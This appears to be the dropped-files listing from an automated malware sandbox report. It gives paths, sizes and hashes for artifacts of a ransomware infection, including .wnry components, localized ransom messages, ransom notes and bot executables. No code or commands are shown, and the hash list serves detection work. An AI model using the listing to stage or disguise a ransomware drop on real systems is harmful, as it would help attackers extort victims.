9a39d409fb0d8116ae0fe05f6797c3b1defff3014c3c0de78416c8600de792711bda81e89e617fffdbbae1b3b4f484182839ff8345ff8f458a90afde7317a84e

Download Submit
C:\PerfLogs\DECRYPT-FILES.txt

Filesize
10KB

MD5
baace55537a504bf55a3d0f0586b8ce9

SHA1
d1b7bc979477238000fbfb5c0e4ecd02d9dde217

SHA256
615b9c7b8a567ef7519f5b136162fbb76c71917a587e10fb6b53722812b403cc

SHA512
d99a90ba8d7142498427c75be0cc61836fba80623e481921c4d05a359815a9d4f141bb1190bac44a9bf7626a832d012d5018ceb6cc93d3c5655d7af38014498f

Download Submit
C:\ProgramData\Microsoft\AppV\Setup\@[email protected]

Filesize
1KB

MD5
fa71d061b4ea314bee06787f0d77d549

SHA1
8858bce05ef3294dc341e97bc079e5b43bea50af

SHA256
3871207d9ab3a01343ec4b9a5dd355efacc8bf1d5c2040ae4f918d2fe25fc7c9

SHA512
a7506da91133c4ab7356fd3d27a9cb13b718ef386116c7304ea87087510f9ae3c9bc42620c743b60410b949109e554d5fd531f404878670908a8f753957226ad

Download Submit
C:\Recovery\WindowsRE\APPGAT~1.exe

Filesize
828KB

MD5
6b3e49b6d32aca957297d8c71e698737

SHA1
73294c085a65af8528ea636ee15132020ba38fe5

SHA256
fef594135e18a708750abad999febeba51d6efe9d6d3073f02a1acb12731eed8

SHA512
151ce51cbcce1ee4cb8b145b02124efc1cb93ef9320da60321cd179d8544930c7f2aa9af4cd4ddd0a71dc32ef5b0069fd8e6bb5e76359d3286d526ccf7e5510b

Download Submit
C:\Users\Admin\AppData\Local\CoinSurf\CoinSurf.WPF.exe

Filesize
312KB

MD5
f2af5d1c111ee516d0ee51470dfbf299

SHA1
ce76ce7cd9aae406a495e680e98e9285927482be

SHA256
7d36de96b489ba8c5400b5c48f2d22fb380200edf42d6966ec43a00670d126f9

SHA512
5a425855384d96776b4a0645e0f85ac050591cc0746b329612dbf721ecf1c65438c4f0e55b3a9f294c128fe288975d87731ef94a10c2d5f92e7d567221589201

Download Submit
C:\Users\Admin\AppData\Local\CoinSurf\app-1.0.5\CoinSurf.WPF.exe

Filesize
304KB

MD5
e335b9d0a88b4336ba9faf41382bc0a4

SHA1
557cf165acc8f7c57142ceaeea743be3caaf58b7

SHA256
88eeb6c853ba6471ec4d59533cd348f237cb7a733f26bfaa52874ff03cbee6ab

SHA512
8d289b171d3cf4b622df853d715d5e7ce5db0c7a26c36a9c7e25a1cf81a77c8faa62f56dc25fcd4a93f536ee0606b305a1d6c158fb11b4a20964067a260fa572

Download Submit
C:\Users\Admin\AppData\Local\CoinSurf\app-1.0.5\csen.exe

Filesize
4.7MB

MD5
07c076cff310bc55c85a492d262e47df

SHA1
610afba8fcdf2c713ea3f0faba74b7c44c50f428

SHA256
e58cfcdc47f72b14903254a7c93704f4360cbaea69ccf8079c7d9997c834eb30

SHA512
203848805d01d3daffb27b6051eca14f9377e36cd006bfd90af9aef583f02a51192f1e79fa57737aaee7d9e62516e7cabadd81daca3efd39cfe96740ccb817e7

Download Submit
C:\Users\Admin\AppData\Local\CoinSurf\packages\CoinSurf.WPF-1.0.5-full.nupkg

Filesize
6.1MB

MD5
14639a7062b1468e2c702665600bbb44

SHA1
05394497fd76694432aa1519a65ba6b8cac2d3d1

SHA256
699da56d1a372958ce9c20c3ee97d8cd1071fdf4420bf9d8cf5a21d83d00ffbc

SHA512
75ba5e8d1500f7c31f897763234c7c76b7d5637d1672c1681ddaf8a43ea1d036f74279d29dd8152e3f467ae55220b148b5dcf56b49058c47de3023f23c1bbc3b

Download Submit
C:\Users\Admin\AppData\Local\CoinSurf\packages\CoinSurf.WPF-1.0.7-full.nupkg

Filesize
6.2MB

MD5
0eedb3eaf23f5d52bdef6ab4daa9ce44

SHA1
15bef62c3d6cab6bc2771bd77eb7564a85adc14a

SHA256
8d48ee0bb0ee1ca36b2127490b682ff846590117d3e3656258e5ac18ff39bbb7

SHA512
67febb7583cb5a488af1271ada20b4436997e32f68d176b233d5bf1fbb6515658664eca7ff2c8ec85498fff8bb8e7b44cb5b87f85c96fc5fd439ac9019fbc470

Download Submit
C:\Users\Admin\AppData\Local\CoinSurf\packages\RELEASES

Filesize
81B

MD5
6e53883dcc461c3f40be461613f9a3e5

SHA1
6f963dacfe384c8699cb93db4e7d2126b86209a2

SHA256
a4fa5be57f7b90ac2fae58799e313e4f9c12b31fdf4fdaed3e7078cd67470f39

SHA512
dcac88983a7e0191e1e7235e9ef6dde77aff236e34c2bf3bbe49981aa99fd62c5fcc371d3479d0fe4d190c8f202324ac8a6123cca12d1bbcd250b40b27529aa1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\afile.exe.log

Filesize
425B

MD5
605f809fab8c19729d39d075f7ffdb53

SHA1
c546f877c9bd53563174a90312a8337fdfc5fdd9

SHA256
6904d540649e76c55f99530b81be17e099184bb4cad415aa9b9b39cc3677f556

SHA512
82cc12c3186ae23884b8d5c104638c8206272c4389ade56b926dfc1d437b03888159b3c790b188b54d277a262e731927e703e680ea642e1417faee27443fd5b3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\DLP\mip\_R_E_A_D___T_H_I_S___R7O9VA_.hta

Filesize
76KB

MD5
12f53449f838def9a6dbee9747d070d3

SHA1
19009b4f0ca8ec0afe1e594a5a07f719db62e0cb

SHA256
03901cbef7b9ef018ab3c495c4c98761e9959cd1f69570f10603e25b3f3a0010

SHA512
9ce8ae0f924960d05df3e46f21854dac975d24a68a89259adc330e79e9481e748cf9afa84f2a6ba508cdda3ed5be569643a979796ed6f98be9285b30fe3bb07f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\DLP\mip\_R_E_A_D___T_H_I_S___Y4BWWGQ_.txt

Filesize
1KB

MD5
029d65228c2c501ee523cd64ff900191

SHA1
e22f658ba2f57ad2bee7a1ff31d5e8b22d04ea3a

SHA256
da2eea193ef8a5890ddb345d6efc03ce1f22fd1e005905abeba217ab5cc0e54f

SHA512
9dcfd7c24df04e225c0c1fce347fb38e61cca65f2578b600c15241d7b0aceea594dcab2d87e485620ef4671a69e605dd02a1591295e73cc02c59ed245a1536cd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\VSH5XF98\edgecompatviewlist[1].xml

Filesize
74KB

MD5
d4fc49dc14f63895d997fa4940f24378

SHA1
3efb1437a7c5e46034147cbbc8db017c69d02c31

SHA256
853d2f4eb81c9fdcea2ee079f6faf98214b111b77cdf68709b38989d123890f1

SHA512
cc60d79b4afe5007634ac21dc4bc92081880be4c0d798a1735b63b27e936c02f399964f744dc73711987f01e8a1064b02a4867dd6cac27538e5fbe275cc61e0a

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Cache\5I5YM6W0\suggestions[1].en-US

Filesize
17KB

MD5
5a34cb996293fde2cb7a4ac89587393a

SHA1
3c96c993500690d1a77873cd62bc639b3a10653f

SHA256
c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad

SHA512
e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Cache\R3NWBE3G\favicon[1].png

Filesize
2KB

MD5
18c023bc439b446f91bf942270882422

SHA1
768d59e3085976dba252232a65a4af562675f782

SHA256
e0e71acef1efbfab69a1a60cd8fadded948d0e47a0a27c59a0be7033f6a84482

SHA512
a95ad7b48596bc0af23d05d1e58681e5d65e707247f96c5bc088880f4525312a1834a89615a0e33aea6b066793088a193ec29b5c96ea216f531c443487ae0735

Download Submit
C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe

Filesize
701KB

MD5
cb960c030f900b11e9025afea74f3c0c

SHA1
bbdcad9527c814a9e92cdc1ee27ae9db931eb527

SHA256
91a293c01eb7f038ddbc3a4caf8b4437da3f7d0abeef6b10d447127fac946b99

SHA512
9ca0291caa566b2cde3d4ba4634a777a884a97c471794eff544923457e331d78f01e1e4e8b893e762a33d7bdaa0f05e8a8b8e587c903e0de9bf61c069e82f554

Download Submit
C:\Users\Admin\AppData\Local\Temp\4KPV6A~1\cached-microdesc-consensus.tmp

Filesize
2.6MB

MD5
a173b8e93561a83eed397b44c6828c69

SHA1
bb13b10ce96fbdb08a3b8212d232e4ed487341e8

SHA256
f8164107078eca9924335d62d5422a51770591cf73eded6616b63cb6df62cb7e

SHA512
47ad20ee565a17547361f0d06a6ee9cc6b08df5f40255d24fcaa4bde041dff3986baf0ebd8192d7d95b826eb41638c766f7c4cd6a0cba616591ca1947b0f6f23

Download Submit
C:\Users\Admin\AppData\Local\Temp\4KPV6A~1\cached-microdescs.new

Filesize
8.7MB

MD5
39368e7814d3023ae7e5cab008c337d9

SHA1
53b1a24494ffa1e3696b830d6c88548b4cc7bd81

SHA256
8cf8b8409b1362769c2dde7530c1ed4c92c81012ec14a049bd56d04862367743

SHA512
176133655b011c833cad4a89b6322ba5e398daa4bd6b2651ddee5d580f127d9e1019d385fe01fabd8b9dce17280d53b7461b6d8c1a9e08ca9fba340d3232d45f

Download Submit
C:\Users\Admin\AppData\Local\Temp\68AD.tmp\68AE.tmp\68AF.bat

Filesize
49B

MD5
76688da2afa9352238f6016e6be4cb97

SHA1
36fd1260f078209c83e49e7daaee3a635167a60f

SHA256
e365685ea938b12790a195383434d825f46c41c80469ce11b9765305780bff7a

SHA512
34659bf4de5c2cbd7cdc7309a48880ac2e1f19e0a4da0c1d4cc45658a81f9f4e7a9293be48e853de812a6b94e1caa3356a715a1a0c14d37b7ae99ba5888bd1df

Download Submit
C:\Users\Admin\AppData\Local\Temp\One_Dragon_Center\MSI.CentralServer.exe

Filesize
1.4MB

MD5
04055601abbd16ec6cc9e02450c19381

SHA1
420bd7c7cad59f1b7cdd2c8a64282ef6f06cfe6e

SHA256
b7620bff5539ff22c251c32e62961beae4f5a91b0f6c73dde1a7da941b93fe13

SHA512
826c13cf6a37c561fb9052b3a0a7424df7d2fe424fe8c3783440c4483aa46a2cf1e4c275c7c080a130e178c7ac3221bb9224126ef4ab0bee38c24b12fa2a70ac

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\220411712738533.bat

Filesize
356B

MD5
56bda98548d75c62da1cff4b1671655b

SHA1
90a0c4123b86ac28da829e645cb171db00cf65dc

SHA256
35e5885504a1745554c26f49a0adab2d26a532838f8e495f211572d42ea19ead

SHA512
eefeab1311ded740628cf3fed32e750266dd2daa833ab8212f8ffe548967f0bd94e48cf11c75345150885268404c0275aab56b4210fb4f21883046611a567a72

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\4363463463464363463463463.exe

Filesize
10KB

MD5
2a94f3960c58c6e70826495f76d00b85

SHA1
e2a1a5641295f5ebf01a37ac1c170ac0814bb71a

SHA256
2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce

SHA512
fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]

Filesize
933B

MD5
f97d2e6f8d820dbd3b66f21137de4f09

SHA1
596799b75b5d60aa9cd45646f68e9c0bd06df252

SHA256
0e5ece918132a2b1a190906e74becb8e4ced36eec9f9d1c70f5da72ac4c6b92a

SHA512
efda21d83464a6a32fdeef93152ffd32a648130754fdd3635f7ff61cc1664f7fc050900f0f871b0ddd3a3846222bf62ab5df8eed42610a76be66fff5f7b4c4c0

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]

Filesize
313KB

MD5
fe1bc60a95b2c2d77cd5d232296a7fa4

SHA1
c07dfdea8da2da5bad036e7c2f5d37582e1cf684

SHA256
b3e1e9d97d74c416c2a30dd11858789af5554cf2de62f577c13944a19623777d

SHA512
266c541a421878e1e175db5d94185c991cec5825a4bc50178f57264f3556080e6fe984ed0380acf022ce659aa1ca46c9a5e97efc25ff46cbfd67b9385fd75f89

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]

Filesize
1.4MB

MD5
63210f8f1dde6c40a7f3643ccf0ff313

SHA1
57edd72391d710d71bead504d44389d0462ccec9

SHA256
2aab13d49b60001de3aa47fb8f7251a973faa7f3c53a3840cdf5fd0b26e9a09f

SHA512
87a89e8ab85be150a783a9f8d41797cfa12f86fdccb48f2180c0498bfd2b1040b730dee4665fe2c83b98d436453680226051b7f1532e1c0e0cda0cf702e80a11

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]

Filesize
3.4MB

MD5
84c82835a5d21bbcf75a61706d8ab549

SHA1
5ff465afaabcbf0150d1a3ab2c2e74f3a4426467

SHA256
ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa

SHA512
90723a50c20ba3643d625595fd6be8dcf88d70ff7f4b4719a88f055d5b3149a4231018ea30d375171507a147e59f73478c0c27948590794554d031e7d54b7244

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\zxcvb.exe

Filesize
5.3MB

MD5
de08b70c1b36bce2c90a34b9e5e61f09

SHA1
1628635f073c61ad744d406a16d46dfac871c9c2

SHA256
432747c04ab478a654328867d7ca806b52fedf1572c74712fa8b7c0edb71df67

SHA512
18a30e480ce7d122cfad5a99570042e3bef9e1f9feda1f7be32b273a7248274285c65ac997c90d3d6a950a37b4ea62e6b928bfefc924187c90e32ea571bfd1f5

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\RIP_YOUR_PC_LOL.exe

Filesize
5.8MB

MD5
637e757d38a8bf22ebbcd6c7a71b8d14

SHA1
0e711a8292de14d5aa0913536a1ae03ddfb933ec

SHA256
477c13d4ca09fdb7fea6487641c6a904d4dee1adecd74ac42e0b00a3842503f9

SHA512
e7a3576370967a4cbd53c33bf65ae26881cca3f713df5bdbcdc9ed76b79e9102c26d5bf940fc2a0e880c7b7ab83c13dcad24608d23981cbcaf551d4e800c67ac

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\b.wnry

Filesize
1.4MB

MD5
c17170262312f3be7027bc2ca825bf0c

SHA1
f19eceda82973239a1fdc5826bce7691e5dcb4fb

SHA256
d5e0e8694ddc0548d8e6b87c83d50f4ab85c1debadb106d6a6a794c3e746f4fa

SHA512
c6160fd03ad659c8dd9cf2a83f9fdcd34f2db4f8f27f33c5afd52aced49dfa9ce4909211c221a0479dbbb6e6c985385557c495fc04d3400ff21a0fbbae42ee7c

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe

Filesize
742KB

MD5
a8b8b90c0cf26514a3882155f72d80bd

SHA1
75679e54563b5e5eacf6c926ac4ead1bcc19344f

SHA256
4fe94f6567af0c38ee6f0f5a05d36286c0607552ea97166a56c4f647e9bf2452

SHA512
88708b20357f1d46957d56d80ac10479cffad72d6bb0268383d360e8904f341c01542b9bbe121b024ef6d6850a1ea4494e077ff124bc9201ae141c46ab1359a4

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\c.wnry

Filesize
780B

MD5
383a85eab6ecda319bfddd82416fc6c2

SHA1
2a9324e1d02c3e41582bf5370043d8afeb02ba6f

SHA256
079ce1041cbffe18ff62a2b4a33711eda40f680d0b1d3b551db47e39a6390b21

SHA512
c661e0b3c175d31b365362e52d7b152267a15d59517a4bcc493329be20b23d0e4eb62d1ba80bb96447eeaf91a6901f4b34bf173b4ab6f90d4111ea97c87c1252

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\m.vbs

Filesize
235B

MD5
eb199eedd01660c289b7279185776a33

SHA1
f522a88b6a89e40b04146a3eb3b4a15f36c7d830

SHA256
93ad6f305f095213661a7ad1d5e3ac9bf36271f066d6ad486bf304bdfedd1c4b

SHA512
b61d54a59b8ecbec99c996df3a392d64a2b87c9711ec2ef59882ccf765f5c1eeb114f2db6e8070514946cbd616567a571927433d59cc9f59906c114a2fbfdc8e

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_bulgarian.wnry

Filesize
46KB

MD5
95673b0f968c0f55b32204361940d184

SHA1
81e427d15a1a826b93e91c3d2fa65221c8ca9cff

SHA256
40b37e7b80cf678d7dd302aaf41b88135ade6ddf44d89bdba19cf171564444bd

SHA512
7601f1883edbb4150a9dc17084012323b3bfa66f6d19d3d0355cf82b6a1c9dce475d758da18b6d17a8b321bf6fca20915224dbaedcb3f4d16abfaf7a5fc21b92

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_chinese (simplified).wnry

Filesize
53KB

MD5
0252d45ca21c8e43c9742285c48e91ad

SHA1
5c14551d2736eef3a1c1970cc492206e531703c1

SHA256
845d0e178aeebd6c7e2a2e9697b2bf6cf02028c50c288b3ba88fe2918ea2834a

SHA512
1bfcf6c0e7c977d777f12bd20ac347630999c4d99bd706b40de7ff8f2f52e02560d68093142cc93722095657807a1480ce3fb6a2e000c488550548c497998755

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_chinese (traditional).wnry

Filesize
77KB

MD5
2efc3690d67cd073a9406a25005f7cea

SHA1
52c07f98870eabace6ec370b7eb562751e8067e9

SHA256
5c7f6ad1ec4bc2c8e2c9c126633215daba7de731ac8b12be10ca157417c97f3a

SHA512
0766c58e64d9cda5328e00b86f8482316e944aa2c26523a3c37289e22c34be4b70937033bebdb217f675e40db9fecdce0a0d516f9065a170e28286c2d218487c

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_croatian.wnry

Filesize
38KB

MD5
17194003fa70ce477326ce2f6deeb270

SHA1
e325988f68d327743926ea317abb9882f347fa73

SHA256
3f33734b2d34cce83936ce99c3494cd845f1d2c02d7f6da31d42dfc1ca15a171

SHA512
dcf4ccf0b352a8b271827b3b8e181f7d6502ca0f8c9dda3dc6e53441bb4ae6e77b49c9c947cc3ede0bf323f09140a0c068a907f3c23ea2a8495d1ad96820051c

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_czech.wnry

Filesize
39KB

MD5
537efeecdfa94cc421e58fd82a58ba9e

SHA1
3609456e16bc16ba447979f3aa69221290ec17d0

SHA256
5afa4753afa048c6d6c39327ce674f27f5f6e5d3f2a060b7a8aed61725481150

SHA512
e007786ffa09ccd5a24e5c6504c8de444929a2faaafad3712367c05615b7e1b0fbf7fbfff7028ed3f832ce226957390d8bf54308870e9ed597948a838da1137b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_danish.wnry

Filesize
36KB

MD5
2c5a3b81d5c4715b7bea01033367fcb5

SHA1
b548b45da8463e17199daafd34c23591f94e82cd

SHA256
a75bb44284b9db8d702692f84909a7e23f21141866adf3db888042e9109a1cb6

SHA512
490c5a892fac801b853c348477b1140755d4c53ca05726ac19d3649af4285c93523393a3667e209c71c80ac06ffd809f62dd69ae65012dcb00445d032f1277b3

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_dutch.wnry

Filesize
36KB

MD5
7a8d499407c6a647c03c4471a67eaad7

SHA1
d573b6ac8e7e04a05cbbd6b7f6a9842f371d343b

SHA256
2c95bef914da6c50d7bdedec601e589fbb4fda24c4863a7260f4f72bd025799c

SHA512
608ef3ff0a517fe1e70ff41aeb277821565c5a9bee5103aa5e45c68d4763fce507c2a34d810f4cd242d163181f8341d9a69e93fe32aded6fbc7f544c55743f12

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_english.wnry

Filesize
36KB

MD5
fe68c2dc0d2419b38f44d83f2fcf232e

SHA1
6c6e49949957215aa2f3dfb72207d249adf36283

SHA256
26fd072fda6e12f8c2d3292086ef0390785efa2c556e2a88bd4673102af703e5

SHA512
941fa0a1f6a5756ed54260994db6158a7ebeb9e18b5c8ca2f6530c579bc4455918df0b38c609f501ca466b3cc067b40e4b861ad6513373b483b36338ae20a810

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_filipino.wnry

Filesize
36KB

MD5
08b9e69b57e4c9b966664f8e1c27ab09

SHA1
2da1025bbbfb3cd308070765fc0893a48e5a85fa

SHA256
d8489f8c16318e524b45de8b35d7e2c3cd8ed4821c136f12f5ef3c9fc3321324

SHA512
966b5ed68be6b5ccd46e0de1fa868cfe5432d9bf82e1e2f6eb99b2aef3c92f88d96f4f4eec5e16381b9c6db80a68071e7124ca1474d664bdd77e1817ec600cb4

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_finnish.wnry

Filesize
37KB

MD5
35c2f97eea8819b1caebd23fee732d8f

SHA1
e354d1cc43d6a39d9732adea5d3b0f57284255d2

SHA256
1adfee058b98206cb4fbe1a46d3ed62a11e1dee2c7ff521c1eef7c706e6a700e

SHA512
908149a6f5238fcccd86f7c374986d486590a0991ef5243f0cd9e63cc8e208158a9a812665233b09c3a478233d30f21e3d355b94f36b83644795556f147345bf

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_french.wnry

Filesize
37KB

MD5
4e57113a6bf6b88fdd32782a4a381274

SHA1
0fccbc91f0f94453d91670c6794f71348711061d

SHA256
9bd38110e6523547aed50617ddc77d0920d408faeed2b7a21ab163fda22177bc

SHA512
4f1918a12269c654d44e9d394bc209ef0bc32242be8833a2fba437b879125177e149f56f2fb0c302330dec328139b34982c04b3fefb045612b6cc9f83ec85aa9

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_german.wnry

Filesize
36KB

MD5
3d59bbb5553fe03a89f817819540f469

SHA1
26781d4b06ff704800b463d0f1fca3afd923a9fe

SHA256
2adc900fafa9938d85ce53cb793271f37af40cf499bcc454f44975db533f0b61

SHA512
95719ae80589f71209bb3cb953276538040e7111b994d757b0a24283aefe27aadbbe9eef3f1f823ce4cabc1090946d4a2a558607ac6cac6faca5971529b34dac

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_greek.wnry

Filesize
47KB

MD5
fb4e8718fea95bb7479727fde80cb424

SHA1
1088c7653cba385fe994e9ae34a6595898f20aeb

SHA256
e13cc9b13aa5074dc45d50379eceb17ee39a0c2531ab617d93800fe236758ca9

SHA512
24db377af1569e4e2b2ebccec42564cea95a30f1ff43bcaf25a692f99567e027bcef4aacef008ec5f64ea2eef0c04be88d2b30bcadabb3919b5f45a6633940cb

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_indonesian.wnry

Filesize
36KB

MD5
3788f91c694dfc48e12417ce93356b0f

SHA1
eb3b87f7f654b604daf3484da9e02ca6c4ea98b7

SHA256
23e5e738aad10fb8ef89aa0285269aff728070080158fd3e7792fe9ed47c51f4

SHA512
b7dd9e6dc7c2d023ff958caf132f0544c76fae3b2d8e49753257676cc541735807b4befdf483bcae94c2dcde3c878c783b4a89dca0fecbc78f5bbf7c356f35cd

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_italian.wnry

Filesize
36KB

MD5
30a200f78498990095b36f574b6e8690

SHA1
c4b1b3c087bd12b063e98bca464cd05f3f7b7882

SHA256
49f2c739e7d9745c0834dc817a71bf6676ccc24a4c28dcddf8844093aab3df07

SHA512
c0da2aae82c397f6943a0a7b838f60eeef8f57192c5f498f2ecf05db824cfeb6d6ca830bf3715da7ee400aa8362bd64dc835298f3f0085ae7a744e6e6c690511

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_japanese.wnry

Filesize
79KB

MD5
b77e1221f7ecd0b5d696cb66cda1609e

SHA1
51eb7a254a33d05edf188ded653005dc82de8a46

SHA256
7e491e7b48d6e34f916624c1cda9f024e86fcbec56acda35e27fa99d530d017e

SHA512
f435fd67954787e6b87460db026759410fbd25b2f6ea758118749c113a50192446861a114358443a129be817020b50f21d27b1ebd3d22c7be62082e8b45223fc

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_korean.wnry

Filesize
89KB

MD5
6735cb43fe44832b061eeb3f5956b099

SHA1
d636daf64d524f81367ea92fdafa3726c909bee1

SHA256
552aa0f82f37c9601114974228d4fc54f7434fe3ae7a276ef1ae98a0f608f1d0

SHA512
60272801909dbba21578b22c49f6b0ba8cd0070f116476ff35b3ac8347b987790e4cc0334724244c4b13415a246e77a577230029e4561ae6f04a598c3f536c7e

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_latvian.wnry

Filesize
40KB

MD5
c33afb4ecc04ee1bcc6975bea49abe40

SHA1
fbea4f170507cde02b839527ef50b7ec74b4821f

SHA256
a0356696877f2d94d645ae2df6ce6b370bd5c0d6db3d36def44e714525de0536

SHA512
0d435f0836f61a5ff55b78c02fa47b191e5807a79d8a6e991f3115743df2141b3db42ba8bdad9ad259e12f5800828e9e72d7c94a6a5259312a447d669b03ec44

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_norwegian.wnry

Filesize
36KB

MD5
ff70cc7c00951084175d12128ce02399

SHA1
75ad3b1ad4fb14813882d88e952208c648f1fd18

SHA256
cb5da96b3dfcf4394713623dbf3831b2a0b8be63987f563e1c32edeb74cb6c3a

SHA512
f01df3256d49325e5ec49fd265aa3f176020c8ffec60eb1d828c75a3fa18ff8634e1de824d77dfdd833768acff1f547303104620c70066a2708654a07ef22e19

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_polish.wnry

Filesize
38KB

MD5
e79d7f2833a9c2e2553c7fe04a1b63f4

SHA1
3d9f56d2381b8fe16042aa7c4feb1b33f2baebff

SHA256
519ad66009a6c127400c6c09e079903223bd82ecc18ad71b8e5cd79f5f9c053e

SHA512
e0159c753491cac7606a7250f332e87bc6b14876bc7a1cf5625fa56ab4f09c485f7b231dd52e4ff0f5f3c29862afb1124c0efd0741613eb97a83cbe2668af5de

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_portuguese.wnry

Filesize
37KB

MD5
fa948f7d8dfb21ceddd6794f2d56b44f

SHA1
ca915fbe020caa88dd776d89632d7866f660fc7a

SHA256
bd9f4b3aedf4f81f37ec0a028aabcb0e9a900e6b4de04e9271c8db81432e2a66

SHA512
0d211bfb0ae953081dca00cd07f8c908c174fd6c47a8001fadc614203f0e55d9fbb7fa9b87c735d57101341ab36af443918ee00737ed4c19ace0a2b85497f41a

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_romanian.wnry

Filesize
50KB

MD5
313e0ececd24f4fa1504118a11bc7986

SHA1
e1b9ae804c7fb1d27f39db18dc0647bb04e75e9d

SHA256
70c0f32ed379ae899e5ac975e20bbbacd295cf7cd50c36174d2602420c770ac1

SHA512
c7500363c61baf8b77fce796d750f8f5e6886ff0a10f81c3240ea3ad4e5f101b597490dea8ab6bd9193457d35d8fd579fce1b88a1c8d85ebe96c66d909630730

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_russian.wnry

Filesize
46KB

MD5
452615db2336d60af7e2057481e4cab5

SHA1
442e31f6556b3d7de6eb85fbac3d2957b7f5eac6

SHA256
02932052fafe97e6acaaf9f391738a3a826f5434b1a013abbfa7a6c1ade1e078

SHA512
7613dc329abe7a3f32164c9a6b660f209a84b774ab9c008bf6503c76255b30ea9a743a6dc49a8de8df0bcb9aea5a33f7408ba27848d9562583ff51991910911f

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_slovak.wnry

Filesize
40KB

MD5
c911aba4ab1da6c28cf86338ab2ab6cc

SHA1
fee0fd58b8efe76077620d8abc7500dbfef7c5b0

SHA256
e64178e339c8e10eac17a236a67b892d0447eb67b1dcd149763dad6fd9f72729

SHA512
3491ed285a091a123a1a6d61aafbb8d5621ccc9e045a237a2f9c2cf6049e7420eb96ef30fdcea856b50454436e2ec468770f8d585752d73fafd676c4ef5e800a

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_spanish.wnry

Filesize
36KB

MD5
8d61648d34cba8ae9d1e2a219019add1

SHA1
2091e42fc17a0cc2f235650f7aad87abf8ba22c2

SHA256
72f20024b2f69b45a1391f0a6474e9f6349625ce329f5444aec7401fe31f8de1

SHA512
68489c33ba89edfe2e3aebaacf8ef848d2ea88dcbef9609c258662605e02d12cfa4ffdc1d266fc5878488e296d2848b2cb0bbd45f1e86ef959bab6162d284079

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_swedish.wnry

Filesize
37KB

MD5
c7a19984eb9f37198652eaf2fd1ee25c

SHA1
06eafed025cf8c4d76966bf382ab0c5e1bd6a0ae

SHA256
146f61db72297c9c0facffd560487f8d6a2846ecec92ecc7db19c8d618dbc3a4

SHA512
43dd159f9c2eac147cbff1dda83f6a83dd0c59d2d7acac35ba8b407a04ec9a1110a6a8737535d060d100ede1cb75078cf742c383948c9d4037ef459d150f6020

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_turkish.wnry

Filesize
41KB

MD5
531ba6b1a5460fc9446946f91cc8c94b

SHA1
cc56978681bd546fd82d87926b5d9905c92a5803

SHA256
6db650836d64350bbde2ab324407b8e474fc041098c41ecac6fd77d632a36415

SHA512
ef25c3cf4343df85954114f59933c7cc8107266c8bcac3b5ea7718eb74dbee8ca8a02da39057e6ef26b64f1dfccd720dd3bf473f5ae340ba56941e87d6b796c9

Download Submit
